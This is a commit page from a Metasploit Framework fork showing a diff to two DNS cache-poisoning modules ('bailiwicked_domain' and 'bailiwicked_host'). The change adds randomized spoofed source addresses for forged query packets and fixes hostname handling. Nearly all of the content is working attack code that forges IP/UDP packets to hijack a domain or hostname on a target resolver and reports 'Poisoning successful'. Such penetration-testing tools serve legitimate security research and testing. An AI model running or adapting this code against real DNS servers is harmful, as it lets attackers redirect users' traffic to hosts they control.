dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now. 

git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2008-07-26 04:35:28 +00:00
parent 9b56053974
commit b4fc255a41
2 changed files with 27 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/auxiliary/spoof/dns/bailiwicked_domain.rb
View File

@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
register_options( register_options(
[ [
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
def run def run
target = rhost() target = rhost()
source = Rex::Socket.source_address(target) source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT'] sport = datastore['SRCPORT']
domain = datastore['DOMAIN'] + '.' domain = datastore['DOMAIN'] + '.'
newdns = datastore['NEWDNS'] newdns = datastore['NEWDNS']
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
req.rd = 1 req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = ( buff = (
Scruby::IP.new( Scruby::IP.new(
#:src => barbs[0][:addr].to_s, :src => src_ip,
:src => source,
:dst => target, :dst => target,
:proto => 17 :proto => 17
)/Scruby::UDP.new( )/Scruby::UDP.new(
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer) answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data| answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == domain and data.name.to_s == newdns) if((name.to_s + ".") == domain and data.name.to_s == newdns)
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
srv_sock.close srv_sock.close
disconnect_ip disconnect_ip
return return
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times = [] times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp( sock = Rex::Socket.create_udp(
'PeerHost' => server, 'PeerHost' => server,
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt] times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0 cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false Thread.critical = false

22
modules/auxiliary/spoof/dns/bailiwicked_host.rb
View File

@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
register_options( register_options(
[ [
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
], self.class) ], self.class)
end end
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def auxiliary_commands def auxiliary_commands
return { return {
"check" => "Determine if the specified DNS server (RHOST) is vulnerable", "check" => "Determine if the specified DNS server (RHOST) is vulnerable",
"racer" => "Determine the size of the window for the target server" "racer" => "Determine the size of the window for the target server",
} }
end end
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def run def run
target = rhost() target = rhost()
source = Rex::Socket.source_address(target) source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT'] sport = datastore['SRCPORT']
hostname = datastore['HOSTNAME'] + '.' hostname = datastore['HOSTNAME'] + '.'
address = datastore['NEWADDR'] address = datastore['NEWADDR']
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
req.rd = 1 req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = ( buff = (
Scruby::IP.new( Scruby::IP.new(
#:src => barbs[0][:addr].to_s, :src => src_ip,
:src => source,
:dst => target, :dst => target,
:proto => 17 :proto => 17
)/Scruby::UDP.new( )/Scruby::UDP.new(
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer) answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data| answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address) if((name.to_s + ".") == hostname and data.address.to_s == address)
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}") print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
disconnect_ip disconnect_ip
return return
end end
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times = [] times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp( sock = Rex::Socket.create_udp(
'PeerHost' => server, 'PeerHost' => server,
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt] times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0 cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false Thread.critical = false
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
avg_count avg_count
end end
end end
end end